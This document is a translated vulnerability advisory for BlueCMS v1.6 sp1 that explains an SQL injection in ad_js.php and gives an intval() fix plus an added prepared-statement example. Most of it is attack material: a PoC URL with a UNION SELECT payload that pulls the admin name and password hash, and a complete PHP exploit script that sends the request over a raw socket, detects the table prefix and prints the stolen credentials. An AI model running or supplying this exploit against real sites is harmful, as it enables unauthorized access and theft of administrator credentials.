Built on today's most popular open-source combination, PHP + MySQL
Every category can have its own Title, Keywords and Description, which is convenient for SEO
A powerful template engine: the display style can be freely defined, any way you like
Multi-function module plugins that are simple and convenient to operate
Smart caching technology to improve site performance
Custom multi-attribute models that give sections powerful functionality
Vulnerable file: ad_js.php
Root cause:
Line 12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; // Every other file in the root directory filters its input well; almost every numeric variable is constrained with intval(). Only this file was missed: it merely calls trim() to strip leading and trailing whitespace, which does nothing against SQL injection.
Line 19: $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id); // The unfiltered value is concatenated straight into the query. Since the value is not quoted, no quote character is needed to break out; "1 and 1=2 union select ..." is accepted as-is.
Fix:
$ad_id = !empty($_GET['ad_id']) ? intval($_GET['ad_id']) : '';
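To make the root cause and the fix concrete, here is an added example (not BlueCMS code and not part of the original advisory) that puts the vulnerable pattern beside the intval() patch and beside a prepared-statement version, and dry-runs the first two against the PoC value so the resulting SQL text is visible. The table name blue_ad, the $mysqli connection and the lookup_ad() helper are assumptions for illustration; nothing here touches a database.

```php
<?php
// Added example, not BlueCMS code. Shows what SQL the vulnerable line and the
// patched line would actually send for the PoC payload, plus a prepared
// statement. Table name blue_ad and $mysqli are assumed for illustration.

// Constructed input: the ad_id value from the PoC URL, already URL-decoded.
$poc = '1 and 1=2 union select 1,2,3,4,5,'
     . 'concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd) '
     . 'from blue_admin where admin_id=1';

// Vulnerable pattern (lines 12 and 19 of ad_js.php): trim() leaves the payload
// intact and it is concatenated straight into the query, so the UNION runs.
function vulnerable_sql(string $raw): string {
    $ad_id = !empty($raw) ? trim($raw) : '';
    return "SELECT * FROM blue_ad WHERE ad_id =" . $ad_id;
}

// The patch above: intval() keeps only the leading integer, so the whole
// "1 and 1=2 union ..." string collapses to 1 and the injected tail is gone.
function patched_sql(string $raw): string {
    $ad_id = !empty($raw) ? intval($raw) : '';
    return "SELECT * FROM blue_ad WHERE ad_id =" . $ad_id;
}

// Preferred form: a prepared statement keeps user data out of the SQL text
// entirely, so the integer cast is no longer the only line of defence.
// $mysqli is an assumed open connection (mysqlnd needed for get_result()).
// Not called in the dry run below.
function lookup_ad(mysqli $mysqli, string $raw): ?array {
    $ad_id = (int) $raw;
    $stmt = $mysqli->prepare("SELECT * FROM blue_ad WHERE ad_id = ?");
    $stmt->bind_param('i', $ad_id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

echo "vulnerable: " . vulnerable_sql($poc) . "\n";
echo "patched:    " . patched_sql($poc) . "\n";
```

Running this prints the full UNION query for the vulnerable form and `SELECT * FROM blue_ad WHERE ad_id =1` for the patched form. One caveat on the patch itself: because `empty("0")` is true in PHP, `ad_js.php?ad_id=0` still produces an empty `$ad_id` and a query ending in `ad_id =`, which is a syntax error rather than an injection; the prepared-statement form does not have that problem.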
PoC:
http://localhost/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1
Right-click and view the page source to read the returned data: the admin name and password hash (separated by "|" and a line break, 0x7C0D0A) are written into the JavaScript that ad_js.php outputs. The injected SELECT must match the column count of the ad table (7 columns here) and uses the default table prefix blue_.
Exploit:
<?php
print_r('
------------------------------------------
BlueCMS v1.6 sp1 "ad_js.php" SQL Injection
get admin_user pwd-hash without login
by CnCxzSec衰仔 http://hi.baidu.com/cncxz
------------------------------------------
');
if ($argc < 3) {
    print_r('
------------------------------------------
usage: php '.$argv[0].' host path
host: without "http://"
path: path to bluecms
example:
php '.$argv[0].' localhost /
------------------------------------------
');
    die;
}
$host = $argv[1];
$path = $argv[2];

// Send one GET request for $path.$inj over a raw socket and return the
// complete HTTP response (headers + body).
function request($host, $path, $inj) {
    $fp = fsockopen($host, 80, $errno, $errstr, 30);
    if (!$fp) {
        die("$errstr($errno)\n");
    }
    $head  = "GET $path$inj HTTP/1.1\r\n";
    $head .= "Host: $host\r\n";
    $head .= "Connection: Close\r\n\r\n";
    fputs($fp, $head);
    $result = '';
    while (!feof($fp)) {
        $result .= fgets($fp, 4096);
    }
    fclose($fp);
    return $result;
}

// Build the injection URL for a given table prefix (default install: blue_).
function payload($prefix) {
    return "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,"
         . "concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)"
         . "%20from%20" . $prefix . "admin%20where%20admin_id=1";
}

// ad_js.php writes the ad content into a document.write("...") call; the
// injected row arrives as  name|\r\nhash  inside the first quoted string.
function show_result($result) {
    $rs1  = strstr($result, "\"");
    $name = substr($rs1, 1, strpos($rs1, "|") - 1);
    $pass = substr($rs1, strpos($rs1, "|") + 5, 32);
    print_r('
username:'.$name);
    print_r('
pwd-hash:'.$pass.'
');
}

$result = request($host, $path, payload('blue_'));
if (stripos($result, "document") === false) {
    // No document.write() in the reply: the default prefix was wrong and the
    // CMS echoed the failing query ("... FROM <prefix>ad WHERE ..."), so
    // recover the real prefix from the error text and retry with it.
    $temp = explode("FROM ", $result);
    if (isset($temp[1])) {
        $temp2 = explode("ad", $temp[1]);
        if ($temp2[0]) {
            $prefix = $temp2[0];
            $result = request($host, $path, payload($prefix));
            show_result($result);
        }
    }
} else {
    show_result($result);
}
?>